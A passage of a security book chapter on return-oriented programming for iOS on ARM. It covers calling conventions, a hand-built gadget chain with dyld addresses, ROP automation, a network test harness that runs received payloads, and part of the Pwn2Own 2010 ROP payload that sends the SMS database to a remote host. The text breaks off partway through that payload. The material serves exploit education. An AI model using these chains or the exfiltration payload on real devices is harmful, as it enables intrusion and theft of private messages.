Chapter 8

Return-Oriented Programming

Starting from iOS version 2.0, data execution prevention (DEP) is enabled by default for all applications running on the device. Therefore, to gain arbitrary code execution the only viable solution is return-oriented programming (ROP). Albeit this technique is not unique to ARM, some peculiar challenges related to this architecture are worth exploring. Moreover, contrary to other platforms where ROP is usually used as a pivot to disable the non-executable bit, on iOS the entire payload needs to be written using ROP because there is no way to disable DEP or code signing from userland.

Because using ROP means you rely on code already present in the address space of an application to write a payload, it is absolutely necessary to understand both the ARM architecture basics and the calling convention used on iOS.

This chapter explores the concepts needed to successfully write a ROP payload. We first describe how to manually chain together existing application bits to create a coherent payload. After that we dissect possible ways of automating the process to avoid the expensive and tedious task of searching for code bits and linking them. We also show and analyze some examples of ROP payloads used in real-life exploits, either to link multiple exploits, or to perform specific tasks such as having the phone vibrate or exfiltrate the SMS database.

Finally, we discuss what testing scenario best fits ROP development on the iPhone, taking into account sandbox restrictions and ASLR.

ARM Basics

ARM is a reduced instruction set code (RISC) architecture, meaning it has very few instructions and many general-purpose registers. In total, 16 registers are identified as R0–R15. Typically, the last three registers have special values and special names. R13 is called SP (the stack pointer register), R14 is called LR (the link register), and R15 is called PC (the program counter). Unlike x86, all of these registers are completely general, meaning, for instance, that it is possible to move an arbitrary value into PC and change the program flow. Likewise, it is perfectly acceptable to read from PC to determine the currently executed instruction.

ARM has two different execution modes, ARM and Thumb. Starting from ARMv7, a third one called Thumb-2 was introduced. The main difference between ARM and Thumb mode is that Thumb instructions are 16 bits (except for call opcodes, which are still 32 bits), whereas in ARM mode all instructions are 32 bits. Thumb-2 instructions are a mix of 16 bits and 32 bits. This design ensures that Thumb code can perform all the operations that ARM code can (for instance, exception handling and access to coprocessors).

For the processor to know whether it is executing ARM or Thumb code, a simple convention is used. If the least significant bit of the address executed is equal to 1, the processor expects to execute Thumb code, otherwise it expects ARM code. More formally, the processor expects to execute Thumb code when the T bit in the CPSR is 1 and the J bit in the CPSR is 0.

ARM and Thumb mode are mostly equivalent in terms of expressiveness, but their mnemonics differ. It is outside the scope of this chapter to analyze all the instructions available on an ARM processor, but we dissect some of them because they are frequently used in the course of this chapter.

iOS Calling Convention

The most important thing to understand when it comes to ROP is the calling convention of the targeted OS.

iOS uses the ARM standard calling convention. The first four arguments are passed using the general-purpose registers R0–R3, whereas any additional parameters are pushed onto the stack. The return value is stored in the R0 register.

In the ARM instruction set, you have several ways of calling a function and changing the execution flow. The simplest way of doing so, besides manually setting the PC to a value of choice, is through the B (branch) instruction. This instruction just changes the PC to the address specified as the first operand.

If you want to return to the instruction following the call, you need the BL (branch and link) instruction. In fact, it not only sets the PC to the address specified by the first operand, but it also stores the return address into the LR register.

If the address to jump to is stored inside a register, you can use the BX instruction. This instruction changes only the execution flow without storing the return address anywhere.

Much like BL, the BLX instruction executes the address stored in the register passed as the first operand and stores the return address into the LR register.

In general, it is very common for ARM-compiled functions to have an epilogue that ends with a BX LR to return to the calling function. Alternatively, a function might push the value of LR onto the stack and then, upon returning, pop it into the PC register.

System Calls Calling Convention

Another vital notion to have when developing ARM payloads is how system calls are invoked on ARM, specifically on iOS. Historically, system calls have been exploit writers' best friends for two reasons. First, they allow the exploit to perform useful and powerful operations without the need to construct abstracted data types usually needed for library calls. For example, consider the simple operation of reading data from a file. You can read from a file using fread() and doing something like this:

fread(mybuf, sizeof(mybuf) -1, 1, filestream);

where mybuf is a C buffer and filestream is a pointer to a FILE structure that looks like this:

typedef struct _sFILE {
        unsigned char *_p;      /* current position in (some) buffer */
        int     _r;             /* read space left for getc() */
        int     _w;             /* write space left for putc() */
        short   _flags;          /* flags, below; this FILE is free if 0 */
        short   _file;           /* fileno, if Unix descriptor, else -1 */
        struct  _sbuf _bf;     /* the buffer (at least 1 byte, if !NULL) */
        int     _lbfsize;       /* 0 or -_bf._size, for inline putc */

        /* operations */
        void    *_cookie;       /* cookie passed to io functions */
        int     (*_close)(void *);
        int     (*_read) (void *, char *, int);
        fpos_t  (*_seek) (void *, fpos_t, int);
        int     (*_write)(void *, const char *, int);

        /* separate buffer for long sequences of ungetc() */
        struct  _sbuf _ub;     /* ungetc buffer */
        struct _sFILEX *_extra; /* additions to FILE to not break ABI */
        int     _ur;            /* saved _r when _r is counting ungetc data */

        /* tricks to meet minimum requirements even when malloc() fails */
        unsigned char _ubuf[3]; /* guarantee an ungetc() buffer */
        unsigned char _nbuf[1]; /* guarantee a getc() buffer */

        /* separate buffer for fgetln() when line crosses buffer boundary */
        struct  _sbuf _lb;     /* buffer for fgetln() */

        /* Unix stdio files get aligned to block boundaries on fseek() */
        int     _blksize;       /* stat.st_blksize (may be != _bf._size) */
        fpos_t  _offset;        /* current lseek offset (see WARNING) */
} FILE;

An attacker would need to keep a structure like this in memory while writing her shellcode. This is often cumbersome and not really needed, because the only piece of information regarding a file that is needed is a file descriptor, an integer. So instead, attackers have historically preferred syscalls:

read(filedescription, mybuff, sizeof(mybuf) – 1);

where the only bit of information needed is the file descriptor (an integer).

The second reason system calls are so attractive to exploit writers is that you can call a syscall without having to worry about library load addresses and randomization. Additionally, they are available regardless of which libraries are loaded in the address space of the application. In fact, a syscall allows a user space application to call code residing in kernel space by using what are known as traps. Each available syscall has a number associated with it that is necessary for the kernel to know what function to call. For the iPhone, the syscall numbers are stored inside the SDK at the relative path: /usr/include/sys/syscall.h.

People familiar with x86 know that syscalls are usually invoked by storing a syscall number into EAX and then using the assembly instruction int 0x80, which triggers the trap 0x80, which is the trap responsible for dealing with syscalls invocation.

On ARM the calling convention is to store arguments the same way you would for normal calls. After that, the syscall number is stored in the R12 register and to invoke it, the assembly instruction SVC is used.

When it comes to return-oriented programming, it is necessary to have the address of a library to find usable SVC instructions because, in general, only library functions use syscalls.

ROP Introduction

Albeit nowadays it is pretty common to talk about ROP as if it was something new, its story goes back to 1997 when a security researcher known as Solar Designer first published an exploit using a technique dubbed “return-into-libc.”

Things have changed wildly since 1997, and ROP today is much more complex, powerful, and useful than it used to be. Nonetheless, to fully understand what ROP is and how it works, return-into-libc is the perfect start.

The idea behind Solar Designer's technique was pretty simple, although revolutionary for the time. If all your shellcode does is spawn a shell and to do that you already have a library function available, why should you write extra code? It's all there already!

The only thing you need to do is understand how to pass parameters to a function and call it. At that time Solar Designer was dealing with a plain stack buffer overflow, which meant he could overwrite the entire stack content as he wished. Traditionally, attackers would have written the shellcode on the stack, and then set the return address to point back to the shellcode to gain code execution.

What Solar Designer did was to put data instead of executable code on the stack, so that instead of having to execute a payload he could just set the return address of the vulnerable function to the execve() library function.

Because on x86 Linux in 1997 the calling convention was to pass parameters on the stack, he pushed onto it the parameter he wanted to pass to execve(), and the exploit was done.

Figure 8.1 shows how a usual stack overflow exploit looked back in those day and the one written by Solar Designer using return-into-libc.

Figure 8.1 Comparison of stack layout between standard exploit and return-into-lib-c

8.1

ROP is based on the concept that instead of being able only to invoke a function using return-into-libc techniques, it is possible to create entire payloads, and programs, based on the code already available in a process address space.

To do that, the ability to maintain control over the stack while developing a payload is vital.

In fact, as long as an attacker can control the stack layout, it is possible for him to chain together multiple “return” instructions that will keep retrieving the instruction pointer from it, and thus execute a number of instructions at will. Imagine the stack shown in Figure 8.2.

Figure 8.2 Sample ROP stack layout

8.2

What will happen here is that after the first call, the first pop-pop-ret instruction sequence jumps to the second function address on the stack and so on. This process can go on for as long as it is needed to achieve the attacker's goal.

ROP and Heap Bugs

If you are unfamiliar with ROP, you might be wondering whether this technique can be used only with stack-based bugs. This is not the case; it is almost always possible to force the stack pointer register to point to a heap location.

Depending on what you have under your control, a different technique has to be used. But all techniques generally boil down to either shifting the stack location until it reaches an address under the attacker's control or moving the content of a register into the stack pointer.

Manually Constructing a ROP Payload

One of the main obstacles to writing ROP payloads is the amount of time needed to find just the right instruction sequence to meet your needs. At a very simple level, because ARM instructions are either two or four bytes aligned, you can just use a simple disassembler and the grep utility for finding them. This can be enough when it comes to simple payloads, because you generally need only a handful of instruction sequences. In this section, you explore this process to get a better feeling of the mental steps that you have to follow to build such a payload.

On the iPhone, all the system libraries are stored together inside a huge “cache” called dyld_shared_cache. To start looking for instructions you need to find a way to extract a library from the shared cache. To do that, you use a tool called dyld_decache, which you can find at https://github.com/kennytm/Miscellaneous. Here you see how to export libSystem on Mac OS X with the decrypted file system mounted (relative path):

./dyld_decache -f libSystem
System/Library/Caches/com.apple.dyld/dyld_shared_cache_armv7

The other important parts of the address space where an attacker can find suitable gadgets are the dynamic linker and the main binary of the application. The former, called dyld, is located at /usr/lib/dyld. The latter is typically inside the application bundle.

To write a ROP payload you start by performing a simple operation, such as writing a word to an already open socket using ROP. The following C code is what you are trying to emulate using ROP:

char str[] = "TEST";
write(sock, str, 4);
close(sock);

When you compile this code, you obtain the following ARM assembly code snippet:

_text:0000307C                 LDR.W           R0, [R7,#0x84+sock] ; int
_text:00003080                 LDR.W           R1, [R7,#0x84+testString] ;
 void *
_text:00003084                 LDR.W           R2, [R7,#0x84+var_EC] ; size_t
_text:00003088                 BLX             _write
_text:0000308C                 STR.W           R0, [R7,#0x84+var_F4]
_text:00003090                 LDR.W           R0, [R7,#0x84+sock] ; int
_text:00003094                 BLX             _close

As expected, the payload is pretty trivial; the compiler uses the stack to store the return value of write() and it reads all the necessary parameters from the stack.

Now that you have a general skeleton of the code, it might be useful to tweak a few things to make the process of translating from ARM Assembly to ROP as painless as possible. You assume the sock descriptor is in R6:

MOV R1, $0x54534554
STR R1, [SP, #0]
STR R1, SP
MOV R1, SP
MOV R2, #4
MOV R0, R6
BLX _write
MOV R0, R6
BLX _close

In this payload you made use of the stack as much as possible. In fact, because with ROP the stack is under an attacker's control, modeling the shellcode this way allows you to reduce the number of gadgets to find because you can directly control the stack content and thus avoid all the store operations on the stack. The other important difference is that you avoid — as much as possible — changing the content and layout of the stack by saving references you need, for example the socket, into unused general-purpose registers.

This example uses dyld, the dynamic linker, from iOS 5.0 to create the ROP payload. The choice of dyld is important for three reasons:

  • It is loaded in the address space of every application.
  • It contains a number of library functions.
  • Unless the main application binary is randomized (that is, compiled with MH_PIE flags), dyld is not randomized either.

To test the ROP payload, this simple application connects to the remote server and then stores the payload in a buffer:

int main(int argc, char *argv[])
{
       
    int sock;
    struct sockaddr_in echoServAddr;
    sock = socket(PF_INET, SOCK_STREAM, 0);
    memset(&echoServAddr, 0, sizeof(echoServAddr));
    echoServAddr.sin_family = AF_INET;
    echoServAddr.sin_addr.s_addr = inet_addr("192.168.0.3");
    echoServAddr.sin_port = htons(1444);
    connect(sock, (struct sockaddr *)&echoServAddr, sizeof(echoServAddr));
    DebugBreak();
    unsigned int *payload = malloc(300);
    int i = 0;

To run the shellcode you use a small assembly snippet that copies the sock variable into the R6 register to comply with the assumption made before. Afterward, you point the stack pointer to the payload variable that contains your crafted stack with the ROP gadgets. Finally, to start the execution you pop the program counter from the newly set stack pointer:

          _asm_ _volatile_ ("mov sp, %0
	"
                          "mov r6, %1
	"
                          "pop {pc}"
                          :
                          :"m"(payload), "m"(sock)
                          );

The goal of the first sequence of ROP gadgets is to store R6 into R0. To do this, the following instructions are executed:

    payload[i] = 0x2fe15f81; //2fe15f80    bd96pop {r1, r2, r4, r7, pc
    i++;
    payload[i] = 0x0; //r1
    i++;
    payload[i] = 0x2fe05bc9; //r2 2fe05bc9  bdea pop  {r1, r3, r5, r6, r7, pc}
    i++;
    payload[i] = 0x0; //r4
    i++;
    payload[i] = 0x0; //r7
    i++;
    payload[i] = 0x2fe0cc91; //pc,        
    /* 4630    mov     r0, r6
       4790    blx     r2
      
       Blx will jump to 2fe05bc9
     */

Now you want to store R0 into R8 so that when you need to call write() it is easy to retrieve the sock descriptor:

    i++;
    payload[i] = 0x0; //r1
    i++;
    payload[i] = 0x2fe0cc31; //r3
    i++;
    payload[i] = 0x0; //r5
    i++;
    payload[i] = 0x0; //r6
    i++;
    payload[i] = 0x0; //r7
    i++;
    payload[i] = 0x2fe114e7; //pc
    /*
     2fe114e6            aa01        add     r2, sp, #4
     2fe114e8            4798        blx     r3
    
       r2 will point to current stack pointer + 4.
blx will jump to 0x2fe0cc31.
     2fe0cc30            4680        mov     r8, r0
     2fe0cc32            4630        mov     r0, r6
     2fe0cc34        f8d220c0        ldr.w   r2, [r2, #192]
     2fe0cc38            4790        blx     r2

     */
    i++;
    payload[i + (4 + 192)/4 = 0x2fe05bc9;
    /* this is used by the previous gadget to obtain a valid address for r2 to
 jump to:
          2fe05bc8      bdea     pop   {r1, r3, r5, r6, r7, pc}

     */

The final step is to set R2 to 4, which is the size of the string you want to write. Point R1 to the stack location containing the string “TEST” and call write():

    i++;
    payload[i] = 0x0; //r1
    i++;
    payload[i] = 0x2fe0b7d5; //r3 bdf0  pop  {r4, r5, r6, r7, pc}
    i++;
    payload[i] = 0x0; //r5
    i++;
    payload[i] = 0x0; //r6
    i++;
    payload[i] = 0x2fe00040; //the value pointed by this + 12 is a 4,
the size of the string we want to write
    i++;
    payload[i] = 0x2fe0f4c5; //pc
    /*
     2fe0f4c4            a903        add     r1, sp, #12
     2fe0f4c6            4640        mov     r0, r8
     2fe0f4c8            68fa        ldr     r2, [r7, #12]
     2fe0f4ca            4798        blx     r3
     r1 will point to the string, r0 to the sock variable and r2 to 4
     */
    i++;
    payload[i] = 0x2fe1d730; //r4, address of _write()
    i++;
    payload[i] = 0x0; //r5
    i++;
    payload[i] = 0x0; //r6
    i++;
    payload[i] = 0x54534554; //r7 points to "TEST" but for no good reasons.
Only r1 needs to point here. This is just a side effect.
    i++;
    payload[i] = 0x2fe076d3;   //pc
    /*
     2fe076d2            47a0        blx     r4
     2fe076d4            b003        add     sp, #12
     2fe076d6            bd90        pop     {r4, r7, pc}

     */

The procedure for calling close() is pretty much identical, except that only R0 needs to be set to the sock descriptor (still stored in R8):

    payload[i] = 0x0; //unused
    i++;
    payload[i] = 0x0; //unused
    i++;
    payload[i] = 0x0; //unused
    i++;
    payload[i] = 0x0; //r4
    i++;
    payload[i] = 0x0; //r7
    i++;
    payload[i] = 0x2fe05bc9; //pc bdea   pop   {r1, r3, r5, r6, r7, pc}
    i++;
    payload[i] = 0x0; //r1
    i++;
    payload[i] = 0x2fe1cf8d; //r3, bdb0   pop   {r4, r5, r7, pc}
    i++;
    payload[i] = 0x0; //r5
    i++;
    payload[i] = 0x0; //r6
    i++;
    payload[i] = 0x2fe076d6;
//arbitrary valid address to not crash when r2 is
 read from r7 + #12
    i++;
    payload[i] = 0x2fe0f4c5; //pc
    /*
     2fe0f4c4            a903        add     r1, sp, #12
     2fe0f4c6            4640        mov     r0, r8
     2fe0f4c8            68fa        ldr     r2, [r7, #12]
     2fe0f4ca            4798        blx     r3
     */
    i++;
    payload[i] = 0x2fe1d55c; //r4, address of close()
    i++;
    payload[i] = 0x0; //r5
    i++;
    payload[i] = 0x0; //r7
    i++;
    payload[i] = 0x2fe076d3; //pc
    /*
     2fe076d2            47a0        blx     r4
     2fe076d4            b003        add     sp, #12
     2fe076d6            bd90        pop     {r4, r7, pc}
     */
    i++;
    payload[i] = 0x0; //unused
    i++;
    payload[i] = 0x0; //unused
    i++;
    payload[i] = 0x0; //unused
    i++;
    payload[i] = 0xcccccccc; //end of payload
    i++;
    payload[i] = 0xcccccccc; //end of payload
    i++;
    payload[i] = 0xcccccccc; //end of payload pc crashes here

In this example, you may have noticed that even a really simple set of operations, such as writing to a remote server and closing the connection to it, can be quite lengthy when ported to ROP. This is especially true when the number of usable instructions at the attacker's disposal is limited.

The next section discusses a number of strategies to automate the process of finding and chaining instruction sequences.

Automating ROP Payload Construction

It should be fairly clear by now that the process of finding suitable instructions by hand is cumbersome and could be time-consuming. During the past couple of years there have been many different proposed approaches to automating the process.

Kornau showed one of the most complete, albeit resource-intense, methodologies: http://static.googleusercontent.com/external_content/untrusted_dlcp/www.zynamics.com/en//downloads/kornau-tim--diplomarbeit--rop.pdf.

The idea behind this approach follows a number of steps. First, because any assembly instruction set tends to be really rich in terms of instructions, and each instruction can perform multiple operations at once, it is handy to have a way to reduce the number of instructions under consideration.

To this end, each binary is first translated into an intermediate language that has fewer instructions, where each one of these new instructions performs one and only one operation.

Once a binary is translated into this intermediate language, through some algorithms that are outside the scope of this chapter, it is possible to have a set of instructions chained together. Those instruction sequences are commonly referred to as gadgets. Each gadget has a specific use case; for instance, you could have the gadget move a register into another register or perform a syscall. Of course, the attacker cannot expect to find exactly what he needs in a binary. Therefore, a gadget might be carrying other operations besides the ones needed to achieve a specific task. These additional operations are called side effects.

At this stage, the attacker has all the gadgets he could possibly find in a given binary. This is not enough, though, because another time-consuming phase is joining together gadgets to create a meaningful payload.

As explained before, each gadget has side effects, and when writing a payload you have to take these side effects into account. For instance, a gadget that performs a syscall might also, as a side effect, clobber the contents of a register. If you needed that register content intact, you would have to find a different gadget that is semantically equivalent but with different side effects, or take the clobbering into account and use a gadget before the “perform syscall” gadget to save the contents of the register and restore it after the system call.

To streamline this process, you can use a compiler. A ROP compiler is a piece of software that automatically chains gadgets together, taking into account side effects for each gadget that is used. One of the most common techniques to implement such a compiler is to use an, Satisfiability Modulo Theory (SMT), solver that will go through each available gadget for an operation and verify whether the conditions on the previous chain of gadgets are verified by that one.

Although this process of finding all the gadgets, annotating them with side effects, and using a compiler to create payloads, is the formally correct way of solving the payload creation problem, it can be time-consuming and not worth it depending on the attacker's needs. For these reasons, a simpler approach was proposed.

If the binary is large enough to include multiple gadgets for a given operation, you can handpick the ones that are mostly side-effect free, so that you don't need to worry about possible problems when chaining them together. Once you have done so, you can write a simple wrapper around those gadgets in your favorite programming language and use it to construct the payload.

Two great examples of this approach are comex's Saffron ROP payload for ARM and Dino Dai Zovi's BISC for x86. To give you a sense of how this idea works in practice, you can examine one of the Python functions found in Saffron to load R0 from an address:

def load_r0_from(address):
    gadget(R4=address, PC=(‘+ 20 68 90 bd’, ‘- 00 00 94 e5 90 80 bd e8’),
 a=‘R4, R7, PC’)

What this function does is to search the available gadget sources for one of the two-byte sequences. The first one, in Thumb mode, 20 68 90 db, corresponds to the following instructions:

6820        ldr     r0, [r4, #0]
bd90        pop     {r4, r7, pc}

The second one in ARM mode corresponds to:

e5940000    ldr   r0, [r4]
e8bd8090    ldmia  sp!, {r4, r7, pc}

This approach obviously has some drawbacks. In fact, it is in general possible to perform the same operations with a huge number of different instruction sequences. Therefore, if you forget a valid binary pattern you might wrongly assume that a given operation is not possible given the gadgets available.

On the other hand, writing such a tool is much faster than the approach using an SMT solver, and in the cases where a huge library or set of libraries is available, it is pretty much all an attacker needs. In the iOS case, if you are able to leak the address of one of the libraries in the dyld_shared_cache, you have at your disposal the entire cache, which is roughly 200 MB in size and contains virtually all the gadgets you might need.

What Can You Do with ROP on iOS?

iOS employs code signing for all the applications present on the device. Code signing can be seen as an enhanced version of DEP-like countermeasures. In fact, on most OSs even when the protection is enabled, it is possible in one way or another to allocate memory pages that are writable, readable, and executable. This results in a defeat of the countermeasure, and for that reason, most of the ROP shellcodes are very simple snippets that aim at disabling the non-executable protection and then pivot to a standard shellcode.

Unfortunately, this is not possible on iOS because no known ways of disabling code signing from userland exist. The attacker is therefore left with three options.

The first one is to write the entire payload using ROP. Later in this chapter you see a real-life example of such a payload.

The second one is to use ROP to chain together two different exploits, a remote one and a local one for the kernel. By doing this the attacker can bypass the userland code signing and execute a normal payload in either kernel space or userland. A famous example of such a combination is shown at the end of the chapter.

Finally, if the exploit targets a recent version of MobileSafari, a ROP payload can write a standard payload to the memory pages reserved for JIT code. In fact, to speed up the browser performances most JavaScript engines employ Just-in-time compilation that requires pages to be readable, writable, and executable (see Chapter 4 for more information on this topic for iOS).

Testing ROP Payloads

It is clear by now that the process of writing and testing a ROP payload can be quite long and cumbersome. The problem is augmented by the fact that applications cannot be debugged on a factory (non-jailbroken) device. This means that the only way for an attacker to test with an exploit (for example, one for MobileSafari) on a factory phone is looking at the crash reports obtained through iTunes.

Debugging a ROP payload is by itself tricky, let alone when the only debugging capability you have are crash logs. To ease this problem and grant some degree of debugging capabilities, it is desirable to have a testing application that enables you to verify the proper functioning of your shellcode.

The following testing harness is pretty simple. You create a server that receives a payload and executes it. The core component is shown here:

void restoreStack()
{
    _asm_ _volatile_("mov sp, %0	
"
                         "mov pc, %1"
                         :
                         :"r"(stack_pointer), "r"(ip + 0x14)
                         );
    //WARNING: if any code is added to read_and_exec the ‘ip + 0x14’
has to be recalculated
}

int read_and_exec(int s)
{   
    int n, length;
    unsigned int restoreStackAddr = &restoreStack;

   
    fprintf(stderr, "Reading length... ");
    if ((n = recv(s, &length, sizeof(length), 0)) != sizeof(length)) {
        if (n < 0)
            perror("recv");
        else {
            fprintf(stderr, "recv: short read
");
            return -1;
        }
    }
    fprintf(stderr, "%d
", length);
    void *payload = malloc(length +1);
    if(payload == NULL)
        perror("Unable to allocate the buffer
");
   
    fprintf(stderr, "Sending address of restoreStack function
");
   
    if(send(s, &restoreStackAddr, sizeof(unsigned int), 0) == -1)
        perror("Unable to send the restoreStack function address");
   
    fprintf(stderr, "Reading payload... ");
    if ((n = recv(s, payload, length, 0)) != length) {
        if (n < 0)
            perror("recv");
        else {
            fprintf(stderr, "recv: short read
");
            return -1;
        }
    }
       
    _asm_ _volatile_ ("mov %1, pc
	"
                          "mov %0, sp
	"
                          :"=r"(stack_pointer), "=r"(ip)
                  );
    _asm_ _volatile_ ("mov sp, %0
	"
                          "pop {r0, r1, r2, r3, r4, r5, r6, pc}"
                          :
                          :"r"(payload)
                          );
   
        //the payload jumps back here
    stack_pointer = ip = 0;
    free(payload);
   
    return 0;
}

The vital parts of this code are the assembly snippets. The first one in the read_and_exec function stores the stack pointer and the instruction pointer of the function in two variables before executing the shellcode. This allows the application to restore the execution after the payload is executed instead of just crashing.

The second assembly snippet of the function effectively runs the ROP payload. It changes the stack pointer so that it points to the heap buffer containing the shellcode and then it pops a number of registers, including the instruction pointer, from the shellcode. At this point the ROP payload is running. These actions are normally the job of the exploit.

The assembly snippet in restoreStack makes sure that the instruction pointer and the stack pointer of the read_and_exec function are restored after the payload is done. This is achieved by sending back to the client the address of the restoreStack function. The client, a Python script, appends the address of the function at the end of the payload so that the execution could potentially resume if the ROP payload ends with a reset of the instruction pointer.

The full source code for both the client and the server are available on this book's website at www.wiley.com/go/ioshackershandbook.

When testing a payload, it is very important to take into consideration the differences between the sandbox profile of the testing application and the profile of the target application. In general, you can expect to have the same sandbox profile for the testing application and an App Store application. (See Chapter 5 for more information about sandbox profiles.)

Unfortunately, that is not the case for most of the system executables. In fact, they tend to have more permissive profiles. This might result in failed function invocations when testing the payload with the test harness.

Finally, as long as the ROP gadgets come from system libraries, it is always possible to tweak the testing harness to link against the specific library. Unfortunately, if the selected gadgets reside inside the main binary, it is not possible to debug it using this methodology.

Examples of ROP Shellcode on iOS

In this section we show and comment on two typical examples of ROP shellcodes on iOS.

The first payload was used for the PWN2OWN competition in 2010 to exfiltrate the content of the SMS database, and it is a good example of ROP-only shellcode.

The second payload was used as part of the jailbreakme.com v3 exploit for iOS prior to 4.3.4. It is a great example of how to minimize ROP payload and use it as a pivot to trigger a kernel vulnerability.

Exfiltrate File Content Payload

This payload is based on binaries from iOS 3.1.3 for iPhone 3GS. The first thing that it does is gain control of the stack pointers and various other registers. In fact, at the beginning of the shellcode execution, the only register under the attacker's control was R0, which pointed to a 40-byte-long buffer:

     // 3298d162      6a07    ldr   r7, [r0, #32]
     // 3298d164    f8d0d028    ldr.w  sp, [r0, #40]
     // 3298d168      6a40    ldr   r0, [r0, #36]
     // 3298d16a     4700    bx   r0

Knowing that R0 and its content are under an attacker's control, the payload sets R7 to point to another attacker-controlled location that will pose as a stack frame. The stack pointer points to arbitrary memory because it is past the 40 bytes under attacker control, therefore the attacker needs another gadget to set it properly.

This is achieved by storing the address 0x328c23ee into R0, which is called in the last instruction. The second gadget looks like this:

     // 328c23ee        f1a70d00        sub.w   sp, r7, #0     
     // 328c23f2            bd80        pop     {r7, pc}
     //

This effectively moves the content of R7 into the stack pointer and thus sets the stack to an attacker-controlled location. From here on the instruction pointer is retrieved from the ROP payload supplied by the attacker.

The rest of the payload performs the following operations, written in pseudo-C:

AudioServicesPlaySystemSound(0xffff);
int fd = open("/private/var/mobile/Library/SMS/sms.db", O_RDONLY);
int sock = socket(PF_INET, SOCK_STREAM, 0);
struct sockaddr address;

connect(sock, address, sizeof(address));
struct stat buf;
stat("/private/var/mobile/Library/SMS/sms.db", &buf);
void *file = mmap(0, buf.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
write(sock, file, buf.st_size);
sleep(1);
exit(0);

The first call is not strictly related to the payload itself. In fact, it is only used to make the phone vibrate for debugging purposes. From there on both the SMS database and a socket are opened. Then, to obtain the size of the file, stat() is called.

To be able to send the file, it is mapped in-memory using mmap(). Later on, the file is sent to the remote server. At this point something interesting happens in that the attacker is forced to call sleep() before closing the application. This is necessary because otherwise the connection to the remote server might be closed before the entire file is sent.

Of course, any programmer might notice that the correct way of sending the file would have been to have a loop sending small chunks one by one until the end of the file. The issue is that writing loops using ROP is not an easy task unless a ROP compiler, as outlined in the section “Automating ROP Payload Construction,” is used. This is also a clear sign that the payload was written by hand.

Before showing the rest of the payload, you need to understand that in this specific example, the attacker knows the address of the fake stack pointer and therefore can easily address and store data structures relative to the fake stack pointer. The rest of the payload, along with comments, is shown in the following code. The execution begins at the address pointed by the ROP values array at line 34 (0x32986a41) in the stealFile_rop_3_1_3_gs function:

function stealFile_rop_3_1_3_gs(sp)
{
      var ropvalues = Array(244);
      function sockaddr_in(ip, port)
{
      var a = String.fromCharCode(0x210); // sin_family=AF_INET, sin_len=16
      var b = String.fromCharCode(((ip[1]&255)<<8)+(ip[0]&255));
      var c = String.fromCharCode(((ip[3]&255)<<8)+(ip[2]&255));
      var p = String.fromCharCode(((port >> 8) &0xff)+((port&0xff)<<8));
      var fill = String.fromCharCode(0);
      fill += fill;
      fill += fill;
            return a + p + b + c + fill;
}

function encode_ascii(str)
{
      var i, a = 0;
      var encoded = "";

      for(i = 0; i < str.length; i++) {
      if (i&1) {
            encoded += String.fromCharCode((str.charCodeAt(i) << 8) + a);
      } else {
            a= str.charCodeAt(i);
            }
      return encoded + String.fromCharCode((i&1) ? a : 0);
}

      // 32 bytes (30 bytes ASCII, 2 bytes zero termination)
      var name = encode_ascii("/private/var/mobile/Library/SMS/sms.db");
      // 16 bytes
      var sockStruct = sockaddr_in(Array(192,168,0,3), 9090);
      var i = 0;

      var locSockStruct = sp + 4*244;
      var locFD = sp + 4*244-4;
      var locSock = locFD - 4;
      var locMappedFile = locSock -4;
      var locStat = locMappedFile - 108;
      var locFilename = locSockStruct + 0x10;

      ropvalues[i++]= 0x87654321; // dummy r7
      ropvalues[i++]= 0x32986a41; // LR->PC (thumb)
            // next chunk executed: set LR
      // 32986a40  e8bd4080   pop   {r7, lr}
      // 32986a44    b001 add sp, #4
      // 32986a46    4770 bx lr

      ropvalues[i++]=0x12345566; // dummy r7
      ropvalues[i++]=0x32988673; // LR (thumb mode)
      ropvalues[i++]=0x11223344; // padding, skipped over by add sp, #4

      // next chunk executed: call single-parameter function
      // 32988672    bd01 pop {r0, pc}

      ropvalues[i++]=0x00000fff; // r0
      ropvalues[i++]=0x30b663cd; // PC

      // LIBRARY CALL
      // 0x30b663cc <AudioServicesPlaySystemSound> 
      // AudioServicesPlaySystemSounds uses LR to return to 0x32988673
      // 32988672    bd01 pop {r0, pc}

      ropvalues[i++]=0x00000000; // r0
      ropvalues[i++]=0x32986a41; // PC
      // next chunk executed: set LR
      // 32986a40  e8bd4080   pop   {r7, lr}
      // 32986a44    b001 add sp, #4
      // 32986a46    4770 bx lr

      ropvalues[i++]=0x12345566; // dummy r7
      ropvalues[i++]=0x32988d5f; // LR (thumb mode)
      ropvalues[i++]=0x12345687; // padding, skipped over by add sp, #4

      // next chunk executed: load R0-R3
      // 32988d5e   bd0f pop {r0, r1, r2, r3, pc}

      ropvalues[i++]=locFilename;      // r0  filename
      ropvalues[i++]=0x00000000;      // r1  O_RDONLY
      ropvalues[i++]=0x00000000;      // dummy r2
      ropvalues[i++]=0xddddeeee;      // dummy r3
      ropvalues[i++]=0x32910d4b;      // PC

      // next chunk executed: call open
      // 32910d4a e840f7b8 blx open
      // 32910d4e   bd80 pop {r7, pc}

      ropvalues[i++] =0x33324444;      // r7
      ropvalues[i++] =0x32987baf;      // PC
      //32987bae   bd02    pop {r1, pc}

      ropvalues[i++] = locFD-8;   //r1 points to the FD
      ropvalues[i++] = 0x32943b5c; //PC
      //32943b5c e5810008 str r0, [r1, #8]
      //32943b60 e3a00001 mov r0, #1 ; 0x1
      //32943b64 e8bd80f0 ldmia sp!, {r4, r5, r6, r7, pc}

      ropvalues[i++] = 0x00000000; //padding
      ropvalues[i++] = 0x00000000; // padding
      ropvalues[i++] = 0x12345687;
      ropvalues[i++] = 0x12345678;
      ropvalues[i++] = 0x32986a41; // PC
      //32986a40    e8bd4080     pop   {r7, lr}
      //32986a44    b001    add sp, #4
      //32986a46    4770    bx lr

      ropvalues[i++]=0x12345566; // r7
      ropvalues[i++]=0x32987baf; // LR
      ropvalues[i++]=0x12345678; // padding
      //32987bae   bd02 pop {r1, pc}

      ropvalues[i++] =0x33324444;  // r7
      ropvalues[i++]=0x32988d5f; // PC
      //32988d5e   bd0f pop {r0, r1, r2, r3, pc}

      ropvalues[i++] =0x00000002;      // r0  domain
      ropvalues[i++] =0x00000001;      // r1  type
      ropvalues[i++] =0x00000000;      // r2 protocol
      ropvalues[i++] =0xddddeeee;      // r3
      ropvalues[i++] =0x328e16dc;      // call socket

      //socket returns to lr which points to 32987bae

      ropvalues[i++] = locSock-8; //r1 points to locSock
      ropvalues[i++] = 0x32943b5c; //PC
      //32943b5c e5810008 str r0, [r1, #8]
      //32943b60 e3a00001 mov r0, #1; 0x1
